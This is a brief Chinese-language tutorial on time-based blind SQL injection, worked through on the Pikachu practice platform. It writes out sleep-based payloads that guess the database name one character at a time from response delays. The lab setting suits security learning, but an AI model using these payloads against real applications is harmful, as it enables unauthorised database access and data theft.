打开pikachu测试平台,sqli base on time 章节。
先输入一个’ 尝试一下,发现反馈不报错。
输入kobe,发现反馈信息不变
打开浏览器的开发者工具,控制台,选择网络
输入 kobe’ and Sleep(5) #,发现延迟5秒发送。
输入错误信息,发现Sleep语句不执行。
这样我们就可以写一个判断kobe’ and if((substr(database(),1,1))=’?’,sleep(5),null)#
数据库首字母如果为真,那么暂停5秒发送,如果为假,则直接发送。
输入kobe’ and if((substr(database(),1,1))=‘a’,sleep(5),null)#
发现,直接发送,没有暂停。
以此类推,直到输入kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#
等待了5秒钟之后,才发送。说明猜测正确,数据库的首字母为P
这样,一次基于时间的sqli盲注就完成了!
相关文章: